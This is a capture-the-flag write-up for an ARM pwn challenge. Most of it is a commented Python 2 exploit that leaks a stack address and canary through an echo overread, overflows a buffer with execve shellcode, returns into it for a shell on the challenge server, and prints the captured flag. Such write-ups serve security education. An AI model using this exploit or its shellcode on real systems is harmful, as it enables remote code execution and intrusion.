Rating:

# **=== arm-exploit (Pwn: 13 solves / 856 pt) ===**

```
from minipwn import *
#
# The minipwn is downloaded from the following URL.
# https://github.com/inaz2/minipwn/blob/master/minipwn.py
#

# Target selection: the commented-out line drives a local copy of the binary
# (handy under gdb); the live line talks to the remote challenge service.
# Note that ``socket`` is only in scope via ``from minipwn import *``.
# s = connect_process("./arm-exploit")
HOST, PORT = "armexploit.acebear.site", 3001
s = socket.create_connection((HOST, PORT))

# 36-byte ARM -> Thumb execve("/bin//sh") shellcode, decoded inline.  The two
# ARM words switch the core into Thumb mode; the Thumb part builds
# argv = ["/bin//sh", NULL] on the stack and issues svc #1 with r7 = 11
# (execve).  Kept as a str, i.e. raw bytes under the Python 2 this script targets.
shellcode = "".join([
    "\x01\x70\x8f\xe2",   # add   r7, pc, #1
    "\x17\xff\x2f\xe1",   # bx    r7              -> Thumb mode
    "\x04\xa7",           # add   r7, pc, #16     -> r7 = &"/bin//sh"
    "\x03\xcf",           # ldmia r7!, {r0, r1}   -> r0 = "/bin", r1 = "//sh"
    "\x52\x40",           # eors  r2, r2
    "\x07\xb4",           # push  {r0, r1, r2}    -> "/bin//sh\0..." on the stack
    "\x68\x46",           # mov   r0, sp          -> r0 = path
    "\x05\xb4",           # push  {r0, r2}        -> argv = [path, NULL]
    "\x69\x46",           # mov   r1, sp          -> r1 = argv
    "\x0b\x27",           # movs  r7, #11         -> __NR_execve
    "\x01\xdf",           # svc   1
    "\xc0\x46",           # nop (mov r8, r8), keeps the string word-aligned
    "/bin//sh",
])

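def Info(sock=None):
    """Select menu option 1 at the "Your choice: " prompt.

    Args:
        sock: connection to drive.  Defaults to the module-level ``s`` so
            existing callers are unaffected; passing a handle explicitly lets
            the helper be reused against a local ``connect_process`` target.
    """
    sock = s if sock is None else sock
    recvuntil(sock, "Your choice: ")
    sendline(sock, "1")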

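def Login(user, password, sock=None):
    """Select menu option 2 and answer the username / password prompts.

    Args:
        user: value sent at the "Username: " prompt.
        password: value sent at the "password: " prompt (plaintext; this is
            the challenge's own login, not a real credential).
        sock: connection to drive.  Defaults to the module-level ``s`` so
            existing callers are unaffected.
    """
    sock = s if sock is None else sock
    recvuntil(sock, "Your choice: ")
    sendline(sock, "2")
    recvuntil(sock, "Username: ")
    sendline(sock, user)
    recvuntil(sock, "password: ")
    sendline(sock, password)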

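def Echo(sock=None):
    """Select menu option 3, which drops the session into the echo loop.

    After this call the service answers with the "arm-exploit:~$ " prompt
    and reflects each "echo ..." command; the rest of the exploit runs there.

    Args:
        sock: connection to drive.  Defaults to the module-level ``s`` so
            existing callers are unaffected.
    """
    sock = s if sock is None else sock
    recvuntil(sock, "Your choice: ")
    sendline(sock, "3")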

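def Change(user, sock=None):
    """Select menu option 4 and submit ``user`` at the "New username: " prompt.

    No length limit is enforced here on purpose: the exploit relies on an
    over-long name (32 bytes) to overrun the server-side username field and
    clobber the adjacent "root" flag — presumably; the server layout is not
    visible from this script.

    Args:
        user: new username to send, any length.
        sock: connection to drive.  Defaults to the module-level ``s`` so
            existing callers are unaffected.
    """
    sock = s if sock is None else sock
    recvuntil(sock, "Your choice: ")
    sendline(sock, "4")
    recvuntil(sock, "New username: ")
    sendline(sock, user)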

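PROMPT = "arm-exploit:~$ "
BUF_SIZE = 128   # bytes from the start of the echo buffer up to the stack canary


def _recv_exact(sock, n):
    """Read exactly ``n`` bytes from ``sock``.

    ``socket.recv(n)`` may legally return fewer bytes than asked for.  The
    original script assumed a full read, so a short read would have produced
    a wrong (or unparsable) leak value.  Raises ``EOFError`` if the peer
    closes the connection before ``n`` bytes arrive.
    """
    chunks = []
    remaining = n
    while remaining > 0:
        chunk = sock.recv(remaining)
        if not chunk:
            raise EOFError("connection closed after %d of %d bytes" % (n - remaining, n))
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


#
# 1. Log in and flip the root flag via the username-change overflow.
#
Login("root", "1111")
Info()

# A 32-byte name overruns the username field and clobbers the flag next to it
# ("Change root flag !" in the original); the second Change restores a sane
# name.  Server-side layout is inferred from behaviour, not visible here.
Change("1" * 32)   # Change root flag !
Change("root")
Info()

# Enter the echo loop; everything below is a command at the shell-like prompt.
Echo()

#
# 2. Leak a stack address.
#
# The input is sent without a newline and is not NUL-terminated server-side,
# so the echo reply runs past the 63 'A's into stale stack contents.  The four
# bytes at reply offset 63..67 hold a stack pointer; the echo buffer sits
# 0x88 bytes below it (offset confirmed by the working run, see the output).
recvuntil(s, PROMPT)
s.sendall("echo " + "A" * 63)
r = _recv_exact(s, 67)
stack_leak_addr = u32(r[63:67])
stack_buf_addr = stack_leak_addr - 0x88
print("stack_leak_addr = " + hex(stack_leak_addr))
print("stack_buf_addr = " + hex(stack_buf_addr))

#
# 3. Leak the stack canary.
#
# "echo " + 124 'A's is 129 bytes: it fills the 128-byte buffer and overwrites
# the canary's low byte, which glibc keeps at 0x00 precisely to stop
# string-based leaks like this one.  With that terminator gone, the reply
# carries the other three canary bytes right after the 124 'A's.
recvuntil(s, PROMPT)
s.sendall("echo " + "A" * 124)
r = _recv_exact(s, 127)
canary = u32("\x00" + r[124:127])   # put the 0x00 low byte back
print("canary = " + hex(canary))

#
# 4. Place the shellcode and forge the return address.
#
# Frame layout from the buffer start: 128-byte buffer | canary | 4 bytes of
# saved register ("DDDD", presumably the saved frame pointer; any value works)
# | return address.  The return address points back at the buffer itself, so
# this needs an executable stack (it has one, per the run below).  Execution
# therefore starts on the 8-byte "echo BBB" prefix, which is run as two ARM
# instructions ahead of the shellcode; they decode to conditional (VS / MI)
# instructions that are expected not to execute — if the shellcode ever
# stops working, check that assumption first.
buf = "echo " + "BBB" + shellcode
buf = buf.ljust(BUF_SIZE, "C")
buf += p32(canary) + "DDDD" + p32(stack_buf_addr)
s.sendall(buf)

# input()   # uncomment to pause here and attach a debugger to the target

# "exit" makes the echo loop return, which pops the forged return address.
recvuntil(s, PROMPT)
sendline(s, "exit")

interact(s)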
```

```
root@kali:# python exploit.py
stack_leak_addr = 0xf6fffb34
stack_buf_addr = 0xf6fffaac
canary = 0xa0300300
BBB?p��?�?�?�R@�hF�iF
'?��F/bin//shCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
root@arm-exploit:~$ id
uid=1000(arm_exploit) gid=1000(arm_exploit) groups=1000(arm_exploit)
cd /home/arm_exploit
cat flag
AceBear{arm_i5_my_sad_m3m0ry}
```